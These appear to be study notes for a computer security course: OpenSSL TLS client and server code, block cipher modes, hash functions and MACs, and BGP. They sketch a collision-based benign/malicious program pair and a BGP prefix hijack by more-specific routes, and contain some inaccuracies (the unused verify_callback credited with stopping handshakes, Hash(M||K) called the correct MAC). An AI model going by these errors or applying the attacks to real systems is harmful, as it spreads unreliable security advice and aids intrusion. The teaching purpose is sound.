#include <arpa/inet.h> #include <openssl/ssl.h> #include <openssl/err.h> #include <netdb.h> #define CHK_SSL(err) if ((err) < 1) { ERR_print_errors_fp(stderr); exit(2); } #define CA_DIR "ca_client" int verify_callback(int preverify_ok, X509_STORE_CTX *x509_ctx) { char buf[300]; X509* cert = X509_STORE_CTX_get_current_cert(x509_ctx); X509_NAME_oneline(X509_get_subject_name(cert), buf, 300); printf("subject= %s\n", buf); if (preverify_ok == 1) { printf("Verification passed.\n"); } else { int err = X509_STORE_CTX_get_error(x509_ctx); printf("Verification failed: %s.\n", X509_verify_cert_error_string(err)); } return preverify_ok; } SSL* setupTLSClient(const char* hostname) { // Step 0: OpenSSL library initialization // This step is no longer needed as of version 1.1.0. SSL_library_init(); SSL_load_error_strings(); SSLeay_add_ssl_algorithms(); SSL_METHOD *meth; SSL_CTX* ctx; SSL* ssl; meth = (SSL_METHOD *)TLSv1_2_method(); ctx = SSL_CTX_new(meth); SSL_CTX_set_verify(ctx, SSL_VERIFY_PEER, NULL); if(SSL_CTX_load_verify_locations(ctx,NULL, CA_DIR) < 1){ printf("Error setting the verify locations. \n"); exit(0); } ssl = SSL_new (ctx); X509_VERIFY_PARAM *vpm = SSL_get0_param(ssl); X509_VERIFY_PARAM_set1_host(vpm, hostname, 0); return ssl; } int setupTCPClient(const char* hostname, int port) { struct sockaddr_in server_addr; // Get the IP address from hostname struct hostent* hp = gethostbyname(hostname); // Create a TCP socket int sockfd= socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); // Fill in the destination information (IP, port #, and family) memset (&server_addr, '\0', sizeof(server_addr)); memcpy(&(server_addr.sin_addr.s_addr), hp->h_addr, hp->h_length); // server_addr.sin_addr.s_addr = inet_addr ("10.0.2.14"); server_addr.sin_port = htons (port); server_addr.sin_family = AF_INET; // Connect to the destination connect(sockfd, (struct sockaddr*) &server_addr, sizeof(server_addr)); return sockfd; } int main(int argc, char *argv[]) { char *hostname = "yahoo.com"; int port = 443; if (argc > 1) hostname = argv[1]; if (argc > 2) port = atoi(argv[2]); /*----------------TLS initialization ----------------*/ SSL *ssl = setupTLSClient(hostname); /*----------------Create a TCP connection ---------------*/ int sockfd = setupTCPClient(hostname, port); /*----------------TLS handshake ---------------------*/ SSL_set_fd(ssl, sockfd); int err = SSL_connect(ssl); CHK_SSL(err); printf("SSL connection is successful\n"); printf ("SSL connection using %s\n", SSL_get_cipher(ssl)); /*----------------Send/Receive data --------------------*/ char buf[9000]; char sendBuf[200]; sprintf(sendBuf, "GET / HTTP/1.1\nHost: %s\n\n", hostname); SSL_write(ssl, sendBuf, strlen(sendBuf)); int len; do { len = SSL_read (ssl, buf, sizeof(buf) - 1); buf[len] = '\0'; printf("%s\n",buf); } while (len > 0); }
-
Sample server
#include <arpa/inet.h> #include <openssl/ssl.h> #include <openssl/err.h> #include <netdb.h> #include <unistd.h> #define CHK_SSL(err) if ((err) < 1) { ERR_print_errors_fp(stderr); exit(2); } #define CHK_ERR(err,s) if ((err)==-1) { perror(s); exit(1); } int setupTCPServer(); // Defined in Listing 19.10 void processRequest(SSL* ssl, int sock); // Defined in Listing 19.12 int main(){ SSL_METHOD *meth; SSL_CTX* ctx; SSL *ssl; int err; // Step 0: OpenSSL library initialization // This step is no longer needed as of version 1.1.0. SSL_library_init(); SSL_load_error_strings(); SSLeay_add_ssl_algorithms(); // Step 1: SSL context initialization meth = (SSL_METHOD *)TLSv1_2_method(); ctx = SSL_CTX_new(meth); SSL_CTX_set_verify(ctx, SSL_VERIFY_NONE, NULL); // Step 2: Set up the server certificate and private key SSL_CTX_use_certificate_file(ctx, "./cert_server/server-cert.pem", SSL_FILETYPE_PEM); SSL_CTX_use_PrivateKey_file(ctx, "./cert_server/server-key.pem", SSL_FILETYPE_PEM); // Step 3: Create a new SSL structure for a connection ssl = SSL_new (ctx); struct sockaddr_in sa_client; size_t client_len; int listen_sock = setupTCPServer(); while(1){ int sock = accept(listen_sock, (struct sockaddr*)&sa_client, &client_len); if (fork() == 0) { // The child process close (listen_sock); SSL_set_fd (ssl, sock); int err = SSL_accept (ssl); CHK_SSL(err); printf ("SSL connection established!\n"); processRequest(ssl, sock); close(sock); return 0; } else { // The parent process close(sock); } } } int setupTCPServer() { struct sockaddr_in sa_server; int listen_sock; listen_sock= socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); CHK_ERR(listen_sock, "socket"); memset (&sa_server, '\0', sizeof(sa_server)); sa_server.sin_family = AF_INET; sa_server.sin_addr.s_addr = INADDR_ANY; sa_server.sin_port = htons (4433); int err = bind(listen_sock, (struct sockaddr*)&sa_server, sizeof(sa_server)); CHK_ERR(err, "bind"); err = listen(listen_sock, 5); CHK_ERR(err, "listen"); return listen_sock; } void processRequest(SSL* ssl, int sock) { char buf[1024]; int len = SSL_read (ssl, buf, sizeof(buf) - 1); buf[len] = '\0'; printf("Received: %s\n",buf); // Construct and send the HTML page char *html = "HTTP/1.1 200 OK\r\n" "Content-Type: text/html\r\n\r\n" "<!DOCTYPE html><html>" "<head><title>Hello World</title></head>" "<style>body {background-color: black}" "h1 {font-size:3cm; text-align: center; color: white;" "text-shadow: 0 0 3mm yellow}</style></head>" "<body><h1>Hello, world!</h1></body></html>"; SSL_write(ssl, html, strlen(html)); SSL_shutdown(ssl); SSL_free(ssl); }
-
Q&A
-
Which line of client code verifies the validity of server certificate?
Answer: It’s the following lines of code:
SSL_CTX_set_verify(ctx, SSL_VERIFY_PEER, NULL); if(SSL_CTX_load_verify_locations(ctx,NULL, CA_DIR) < 1){ printf("Error setting the verify locations. \n"); exit(0); }
The
SSL_VERIFY_PEER
option enforces the certificate check. On the server side, this is usuallySSL_VERIFY_NONE
because most TLS clients do not have a certificate. -
How does the client guarantee that the server is the owner of the certificate?
Answer: Server verifies that it is the owner of the certificate by having the correct private key corresponding to the public key in the certificate. If the server does not have the correct private key, when client sends the pre-master secret during the TLS handshake, the server won’t decrypt it correctly, and won’t calculate the correct session key.
-
Which line of client code verifies if the server is the intended server?
Answer: it’s the common name check.
X509_VERIFY_PARAM *vpm = SSL_get0_param(ssl); X509_VERIFY_PARAM_set1_host(vpm, hostname, 0);
-
Which line of client code forces TLS handshake to stop if verification fails? Answer: It’s the
verify_callback
function. If the certificate verification fails, it will returnpreverify_ok
, which has a value indicating verification failure. This will stop TLS handshake.
-
-
-
Case studies
-
Usually, when a user connects to a server with TLS, the user provides the domain name of the server, and the actual IP address of the server is acquired by DNS. What if a user tries to connect to a server given an IP address? Is it going to be secure?
Answer: No! Because in this case, both domain name and certificate will be provided by the attacker. As a result, the common name check can be broken!
-
Even if the IP is genuine, the approach above is still insecure. Because attacker can sniff your traffic and spoof reverse DNS lookup result as well as their own certificate to the user. In this way, the attacker can decrypt your traffic.
However, if you are trying to reach a server with domain name, you are forcing the other server to provide a valid certificate that has a matching common name. Usually, this is not doable unless the other side is indeed the desired one.
-
Secret-key Encryption
-
Common ciphers
- Monoalphabetic substitution cipher (can be broken w/ frequency analysis)
- Polyalphabetic substitution cipher
- DES (key size=56 bits, block size=64 bits), AES (key size=128,196… bits, block size=128 bits)
-
Attack models
- Ciphertext attack: the attacker only knows the ciphertext. If this does not lead to leakage of further information, the encryption is considered secure.
- Plaintext attack: the attacker knows both plaintext and ciphertext. If this does not lead to leakage of further information, the encryption is considered secure.
- Chosen plaintext attack: the attacker can choose a specific plaintext and obtain its corresponding ciphertext. If this does not lead to leakage of further information, the encryption is considered secure.
-
Encryption modes
-
Electronic Codebook Mode (ECB)
The problem of this encryption mode is the lack of diffusion: identical plaintext will result in identical ciphertext, which means the structure of plaintext can be leaked.
-
Cipher Block Chaining (CBC)
In this mode, decryption can be done in parallel if all ciphertext blocks are available. However, encryption cannot be done in parallel because the output of a ciphertext block depends on the previous one.
The initialization vector (IV) is used to ensure same plaintext will not generate the same ciphertext. IV is not considered a secret: it can be released without damage.
- Question: Suppose during the transmission, the fifth bit of the second ciphertext block is corrupted. How many data loss will we face? Answer: we will lose the entire second block as well as the fifth bit of the third block.
-
Cipher Feedback (CFB)
This is similar to CBC. One important property of CFB is that we have turned a block cipher into a stream cipher, that is, we can do encryption and transmission bit by bit.
-
Output Feedback (OFB)
This mode is similar to CFB, except that the data is fed into the next block before XOR operation. This allows encryption to be parallelizable without waiting for the plaintext. OFB also has stream cipher property. It is essentially using a cipher as random number generator.
-
Counter Mode (CTR)
Counter mode works with a nounce and block counter. Obviously, both encryption and decryption can be done in parallel. Like IV, nounce does not necessary need to be kept secret.
-
-
Modes that do not require padding: CFB, OFB, CTR (effectively stream ciphers)
-
Initialization Vectors and common mistakes
IVs are not necessarily secrets. However, this does not mean that we can select them at will. If we do not follow certain rules, this will result in severe security flaws. We discuss the following scenarios provided that the encryption key stays the same.
-
Common mistake: using the same IV
A basic requirement for IV is uniqueness, which means no IV should be reused under the same key. For some cipher modes, reusing IV can be catastrophic. In OFB, the use of static IV will make the encryption scheme vulnerable to known plaintext attack. If the attacker knows both plaintext and ciphertext, the attacker will be able to decrypt all subsequent ciphertext, if the IV is reused. That is because the output of OFB will always be the same if the key and IV are identical.
-
Common mistake: using predictable IV
If the IV is predictable, it will create security flaw in some encryption modes, e.g. CBC. Using predictable IV will make CBC susceptible to chosen plaintext attack. There are three assumptions under this scenario:
- The IV used for next message is predictable.
- CBC is used.
- The victim will encrypt any plaintext the attacker provides.
Then the attacker can guess what message was sent by the victim. He can do XOR operation to his plaintext with the previous IV and next IV, and then he can compare the resulting ciphertext to deduce if the previous plaintext is the same, just as it is shown below.
-
One-way Hash Function
-
What hash functions do: they generate a fixed length digest for a message of arbitrary length.
-
Properties of a cryptographic hash function
Denote the hash function by \(h\).
- One-way: Given a hashed value \(v\), it should be difficult to find a message \(m\) such that \(h(m)=v\).
- Collision resistant: It should be difficult to find two messages \(m_1\) and \(m_2\) such that \(h(m_1) = h(m_2)\).
-
Case study: the number game
A and B both come up with a number. If the sum is even, then A wins; otherwise B wins.
- The dilemma: anyone that releases his number first loses.
- Dealing the dilemma with a hash function
- A chooses his number and sends the hashed value of his number to B.
- When B acquires A’s hash value, B can disclose his number to A.
- After receiving B’s answer, A reveals his answer. B can verify A indeed chose this number by comparing the hash value.
- This is fair for A because of one-way property. Given the hash value, it is difficult for B to know what number is chosen by A.
- This is fair for B because of collision resistant property. Because it is difficult for A to find multiple values that hash to the same value. That is, the value revealed in the third step is indeed the value A chose.
-
Common hash functions
-
The Message Digest (MD) series: MD2, MD4, MD5
MD2 and MD4 are severely flawed and should not be used. The collision-resistant property of MD5 is broken, yet it is still one-way.
-
The Secure Hash Algorithm (SHA) series: SHA1, SHA-2, SHA-3
-
-
How hash function works
Most hash functions use a similar construction structure called Merkle–Damgård construction. Input data is broken into blocks of fixed size, with a padding added to the last block. Each block and the output of the previous iteration are fed into a compression function; the first iteration uses a fixed value called IV as one of its inputs.
Notice that SHA-3 does not use this structure anymore.
- Applications of hash functions
-
Integrity verification
If we change a bit in the message, its hash value would be completely different. Therefore, we can use the hash value to determine if a document/file has been modified or not.
-
Committing a secret without telling it
One can prove that he knows a specific secret without telling it. He can simply hash the secret and then disclose the hashed value. The one-way proerty makes it almost impossible for others to get the secret given the hashed value. The collision resistant property makes it almost impossible to change the secret without being noticed after disclosing the hashed value.
-
Password verification
It’s unwise to save passwords as plaintext because every user will be compromised if the password database is stolen. If we store the hashed value of password instead, due to the one-way property, it is difficult for the attacker to get user’s password.
-
The use of salt
If multiple users have the same password, their hashed value will be the same. To avoid this situation, we usually hash the password concatenated with a random string called salt. This guarantees that the hashed value will not be the same even two users have identical passwords.
- On Linux, the hashed password is acquired by hashing the password-salt mixture 5000 times. This will slow the hashing process by a factor of 5000, which effectively slows down brute-force attack.
- None of IV, nounce and salt are necessarily confidential.
-
-
Trusted timestamping
Sometimes we would like to prove we have the copyright of a digital document without publishing it. To do so, we can use a service called trusted timestamping. Basically, instead of publishing the entire digital content, one only publishes the hashed value of the content. He needs to publish the hash value to a printed media or a Time Stamping Authority (TSA). The TSA will sign the hash with their private key to certify its validity.
-
Message Authentication Code (MAC)
MAC is used to detect whether the message has been modified or not during transmission. We can use one-way hash functions to implement MAC. Obviosuly, we cannot just use the hash of a message as the MAC, because this allows anyone to forge the MAC. We need to concatenate a secret key with the actual message first, and then compute the hash. As it turns out, whether to put the key before or after the message will affect the security of resulting MAC significantly. \(\newcommand{\mac}{\operatorname{Hash}}\)\(\newcommand{\msum}{\mathbin{\left\lVert\right.}}\)
-
Length extension attack
Denote the secret key by \(K\) and message by \(M\). The correct way to generate MAC is to compute \(\mac(M \msum K)\). If one computes MAC by \(\mac(K \msum M)\), it will lead to security loopholes!
Review the Merkle–Damgård construction process as below. If the we compute MAC by \(\mac(K \msum M)\), it is possible to extend the length of \(M\) and generate the correct MAC without knowing what the key is! More concretely, the attacker needs to know padding \(P\), then given any message \(T\), he can get the MAC by computing \(\mac(K \msum M \msum P \msum T)\). This is because the Merkle–Damgård construction process breaks down message into blocks and use the chained compression function technique to compute the output. We the attacker needs to do is to insert \(P\) and \(T\) into the chain as if they are a complete message.
-
Key-Hash MAC Algorithm (HMAC)
It is really important to avoid rebuilding wheels in cryptography, since the tiniest error can lead to severe security flaws. Almost all existing libraries and algorithms are carefully tweaked to enhance security. There is a well-known algorithm to generate MAC given key and message. We must need to call \(\operatorname{HMAC}(K, M)\).
-
-
-
Hash Collision Attacks
-
Forging fake public-key certificates
Suppose an attacker can find two certificates that shares the same hash value but with different common names. For example, the first one’s CN is
example.com
, and the second one’s CN is attacker’s ownattacker32.com
. Then he can let the CA sign the second version, and he will effectively have a valid certificate forexample.com
.This idea can be extended to forging fake signed programs, PDF documents and so on.
-
Generating two different files with the same MD5 hash
The tool developed by Marc Stevens can generate two files that share the same MD5 value. The prefix of two files are the same. For example, message one and two are shown as below.
$ cat message1.bin | xxd 00000000: 4dc9 68ff 0ee3 5c20 9572 d477 7b72 1587 M.h...\ .r.w{r.. 00000010: d36f a7b2 1bdc 56b7 4a3d c078 3e7b 9518 .o....V.J=.x>{.. 00000020: afbf a200 a828 4bf3 6e8e 4b55 b35f 4275 .....(K.n.KU._Bu 00000030: 93d8 4967 6da0 d155 5d83 60fb 5f07 fea2 ..Igm..U].`._... $ cat message2.bin | xxd 00000000: 4dc9 68ff 0ee3 5c20 9572 d477 7b72 1587 M.h...\ .r.w{r.. 00000010: d36f a7b2 1bdc 56b7 4a3d c078 3e7b 9518 .o....V.J=.x>{.. 00000020: afbf a202 a828 4bf3 6e8e 4b55 b35f 4275 .....(K.n.KU._Bu 00000030: 93d8 4967 6da0 d1d5 5d83 60fb 5f07 fea2 ..Igm...].`._...
The MD5 and SHA-1 sum of these two messages are shown as below.
$ md5sum message1.bin message2.bin 008ee33a9d58b51cfeb425b0959121c9 message1.bin 008ee33a9d58b51cfeb425b0959121c9 message2.bin $ sha1sum message1.bin message2.bin c6b384c4968b28812b676b49d40c09f8af4ed4cc message1.bin c728d8d93091e9c7b87b43d9e33829379231d7ca message2.bin
If the hash function happen to use Merkle–Damgård construction, then we can use the length extension technique to append a common suffix to both
message1.bin
andmessage2.bin
, and the resulting hash value of them will still be the same. -
Generating two programs with the same MD5 hash
We can use the same idea above to generate two programs with the same MD5 hash. Suppose the program is given as follows. Assume the
xyz
array is filled with 200'A'
’s.#include <stdio.h> unsigned char xyz[200] = {"..."}; // fill with actual content int main(){ int i; for(i = 0; i < 200; ++i){ printf("%x ", xyz[i]); } }
Now, we can locate the
xyz
array inside the program’s binary, and we can divide the program into three parts:- The prefix (whose length must be a multiple of 64)
- The center (whose length must be 128)
- The suffix
The center must be inside array
xyz
completely since it needs to be filled with arbitrary content without affecting the program’s control logic. We run the MD5 collision generator on prefix+center, and we require the prefix part of two generated messages to be the same. As a result, we are able to come up with two versions of this program, which can be represented by- Version 1: prefix+Q
- Version 2: prefix+P
, where P and Q are different, but both versions have the same hash value. The next step is to use the length extension technique to concatenate the suffix to these two versions. As a result, we have created two programs
- Program 1: prefix+Q+suffix
- Program 2: prefix+P+suffix
which have identical hash value but have different data stored in
xyz
array.To alter the control logic of program 1 and program 2 in the attacker’s favor, one can check if
xyz
is still filled with allA
’s in later code sections. Ifxyz
is not allA
’s, then the program can start to execute some malicious code. That is to say, we can create two programs that have the same hash value, but one is benign and the other one is malicious.
-
BGP: Border Gateway Protocol
- Four types of Autonomous Systems (AS)
- Stub
- Multihomed
- Transit
- Internet Exchange Point (IXP)
-
BGP speakers
Each AS has one or more BGP speakers to talk to other AS. They would exchange information on where this AS can reach constantly via a BGP session, this is called peering. As a result, a piece of information shared by a single AS can be propagated to the entire Internet.
-
BGP update
- Routing information is updated by prefix advertisement: an AS will announce a specific network prefix is reachable via this AS. For example, AS 11872 can announce prefix 128.230.0.0/16 is reachable.
- There can be multiple paths available to a specific prefix. Usually, the AS will only propagate one path to its neighbor. This path is selected by the path selection algorithm.
-
The path selection algorithm selects a path in the BGP table. A sample BGP table is shown as below.
$ telnet route-views.optus.net.au route-views.optus.net.au>show bgp BGP table version is 1098639742, local router ID is 203.202.125.6 Status codes: s suppressed, d damped, h history, * valid, > best, i - internal, r RIB-failure, S Stale, m multipath, b backup-path, x best-external Origin codes: i - IGP, e - EGP, ? - incomplete Network Next Hop Metric LocPrf Weight Path * 1.0.0.0/24 203.202.143.33 0 7474 4826 13335 i * 202.139.124.130 1 0 7474 4826 13335 i * 203.13.132.7 10 0 7474 4826 13335 i *> 203.202.143.34 0 7474 4826 13335 i * 192.65.89.161 1 0 7474 4826 13335 i *> 1.0.4.0/24 203.202.143.33 0 7474 4826 38803 56203 i * 202.139.124.130 1 0 7474 4826 38803 56203 i * 203.13.132.7 1 0 7474 4826 38803 56203 i * 203.202.143.34 0 7474 4826 38803 56203 i * 192.65.89.161 1 0 7474 4826 38803 56203 i
The selection criteria include:
- weight
- local preference (larger values indicates higher likelihood to be chosen)
- local generated/aggregated
- shortest AS length
-
Path prepending
Suppose an AS is connected to several ISP (all AS themselves), but the AS wants prefers the traffic to go through one particular ISP, while others are reserved as backups. The AS can enforce this preference by doing path prepending: he can intentionally repeat this own AS number multiple times to increase the AS length of AS path.
- Besides updates, withdraw messages can be propagated as well.
- Interior BGP (IBGP): the protocol used for BGP speakers inside one AS to communicate internally.
-
Interior Gateway Protocol (IGP): a type of protocol used for exchanging routing information between gateways (commonly routers) within an autonomous system.
Examples:
- Routing Information Protocol (RIP)
- Open Shortest Path First (OSPF)
-
Overlapping routes
When an IP address match with multiple entries on BGP table, the one with longest match is selected.
Overlapping routes can be used to achieve:
- Globalization: split subnets into multiple geographic locations in the world.
- Load balancing: allocate each subnet to a BGP entry
-
IP Anycast
To achieve load balancing, there are two approaches:
- Use domain name: dynamic DNS can assign different IP addresses for loading balancing
- Use IP anycast: all machines have the same IP address, you only need to reach one of them that has the best AS path.
- IP anycast is usually used for stateless services/short connections.
-
Prefix hijacking attack
Suppose you want to hijack 128.230.0.0/16. What you need to do is to announce two new entries
128.230.0.0/17 128.230.128.0.0/17
, and then all traffic to 128.230.0.0/16 will be diverted to you.
-
BGP Protection
- Encryption
- TTL Security: because BGP speakers are physically connected, they can set packet TTL to 255. If packet comes from a remote host, it is impossible for TTL to be 255.
- Filtering: filter prefix updates and paths.